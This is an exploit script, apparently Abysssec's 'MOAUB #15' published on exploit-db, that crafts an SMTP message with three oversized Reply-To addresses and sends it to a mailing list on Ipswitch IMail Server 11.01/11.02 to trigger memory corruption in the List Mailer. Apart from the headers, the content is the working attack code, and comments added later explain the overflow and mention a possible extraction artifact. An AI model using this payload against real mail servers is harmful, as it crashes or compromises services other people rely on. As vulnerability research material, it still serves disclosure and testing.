
# Title : MOAUB #15 - Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption
# Published : 2010-09-15
# Author : Abysssec


'''
  __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ < 
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

http://www.exploit-db.com/moaub-15-ipswitch-imail-server-list-mailer-reply-to-address-memory-corruption/

'''

'''
  Title               :  Ipswitch Imail Server List Mailer Reply-To Address memory corruption
  Version             :  Imail server v11.01 and 11.02
  Analysis            :  http://www.abysssec.com
  Vendor              :  http://www.ipswitch.com
  Impact              :  Critical
  Contact             :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter             :  @abysssec

'''

import smtplib

# Envelope values handed to smtplib further down: the SMTP sender and a single
# recipient. The recipient name suggests a mailing-list address on the
# author's test host (presumably served by the IMail List Mailer -- confirm).
sender = 'from@fromdomain.com'
receivers = ['CrashList@wapteam-f556693']

# Ordinary From/To header lines that open the message.
leading_headers = (
    "From: From Person <from@fromdomain.com>\n"
    "To: To Person <CrashList@wapteam-f556693>\n"
)

# The Reply-To address is the malformed part: a 400-character local part
# (200 x "A", 4 x "a", 196 x "B") in front of "@exam.com". RFC 5321 caps a
# local part at 64 octets, so a gateway or content filter that rejects or
# flags over-long Reply-To addresses would stop this message before it
# reaches the list processor in IMail 11.01 / 11.02 (the versions the page
# header names as affected).
oversized_local_part = "A" * 200 + "a" * 4 + "B" * 196

# NOTE(review): each field is followed by the literal character "n", kept
# exactly as published. This may be an artifact of how the page was
# extracted; as written, the three fields are not placed on separate lines.
reply_to_field = "Reply-To: " + oversized_local_part + "@exam.com" + "n"
reply_to_repeats = 3

# Subject line and a short plain-text body close the message.
closing_part = (
    "\n"
    "Subject: SMTP e-mail test\n"
    "\n"
    "This is a test e-mail message.\n"
    "\n"
)

message = leading_headers + reply_to_field * reply_to_repeats + closing_part
#print message  
#fp = open("C:\Program Files\Ipswitch\IMail\spool\tmp188.tmp","w")
#fp.write(message)
#fp.close()
#print "wrote"
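# Submit the prepared message to the SMTP service on this host (default port)
# and report whether the server accepted it. Acceptance only means the message
# was queued; any fault in Reply-To handling would show up afterwards in the
# mail server's own process and logs, not in this script's output.
smtpObj = None
try:
   smtpObj = smtplib.SMTP('localhost')
   smtpObj.sendmail(sender, receivers, message)
   # Parenthesised single-string print gives the same output on Python 2 and 3.
   print("Successfully sent email")
except smtplib.SMTPException:
   # The exception must be qualified: only the smtplib module is imported, so
   # a bare SMTPException would raise NameError instead of reaching this
   # branch. Socket-level failures (e.g. connection refused) are still not
   # caught here, as in the original.
   print("Error: unable to send email")
finally:
   # Release the socket on every path; close() is used rather than quit() so
   # cleanup cannot raise if the server has already dropped the connection.
   if smtpObj is not None:
      smtpObj.close()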